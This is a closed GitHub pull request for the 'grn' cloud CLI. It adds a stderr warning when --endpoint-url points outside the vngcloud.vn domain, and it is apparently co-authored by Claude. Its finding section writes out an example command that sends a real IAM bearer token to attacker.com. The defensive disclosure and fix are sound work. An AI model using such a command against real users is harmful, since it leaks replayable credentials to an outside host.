Skip to content

security(cli): warn on --endpoint-url outside trusted vngcloud.vn domain (SEC-08)#24

Closed
vks-team wants to merge 1 commit into
mainfrom
security/sec-08-untrusted-endpoint-warning
Closed

security(cli): warn on --endpoint-url outside trusted vngcloud.vn domain (SEC-08)#24
vks-team wants to merge 1 commit into
mainfrom
security/sec-08-untrusted-endpoint-warning

Conversation

@vks-team

@vks-team vks-team commented Jul 1, 2026

Copy link
Copy Markdown
Contributor

Finding (SEC-08)

grn authenticates against the real IAM (iamapis.vngcloud.vn, hardcoded) to mint a bearer token, then sends it with every request to whatever --endpoint-url names. --endpoint-url only changes the VKS/vServer base URL, not IAM — so:

grn vks list-clusters --endpoint-url http://attacker.com
→ Authorization: Bearer <real-token>   sent to attacker.com

The token is a plain bearer (not signed per-request like AWS SigV4), so a host that captures it can replay it against the real API until it expires. Worse combined with --no-verify-ssl (MITM). Confirmed in code:

  • internal/auth/token.go — IAM URL is hardcoded, unaffected by --endpoint-url.
  • internal/client/client.goAuthorization: Bearer set on every request to baseURL (= --endpoint-url).
  • No host allowlist or warning existed.

Fix (warn, don't block)

Add cli.IsTrustedEndpoint / cli.WarnIfUntrustedEndpoint and call them from the VKS and vServer client builders. When --endpoint-url resolves to a host outside *.vngcloud.vn, print a stderr warning that a replayable bearer token will be sent there. Does not block — legitimate custom/test endpoints still work (consistent with how aws permits --endpoint-url). Token scoping by host is a server-side concern and out of scope here.

Example:

Warning: --endpoint-url "attacker.com" is outside the trusted vngcloud.vn domain. grn will send your IAM bearer token to this host, and a bearer token can be replayed. Only use endpoints you trust.

Testing

  • TestIsTrustedEndpoint: empty/vngcloud.vn/*.vngcloud.vn trusted; attacker.com, evil.vngcloud.vn.attacker.com, localhost, malformed → untrusted.
  • Verified via binary: untrusted host warns, trusted host silent.
  • go vet ./... clean; full go test ./... passes; build clean.

🤖 Generated with Claude Code

…ain (SEC-08)

grn authenticates against the real IAM and sends the resulting reusable bearer
token to whatever host --endpoint-url names — so a mistyped or malicious host
captures a token it can replay against the real API. Unlike AWS SigV4 (signed
per request/host), this bearer is replayable.

Add cli.IsTrustedEndpoint / WarnIfUntrustedEndpoint and call it from the VKS and
vServer client builders: when --endpoint-url resolves to a host outside
*.vngcloud.vn, print a stderr warning that a bearer token will be sent there.
Warns only; does not block (custom/test endpoints still work).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@vks-team vks-team closed this Jul 1, 2026
@vks-team vks-team deleted the security/sec-08-untrusted-endpoint-warning branch July 1, 2026 16:26
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant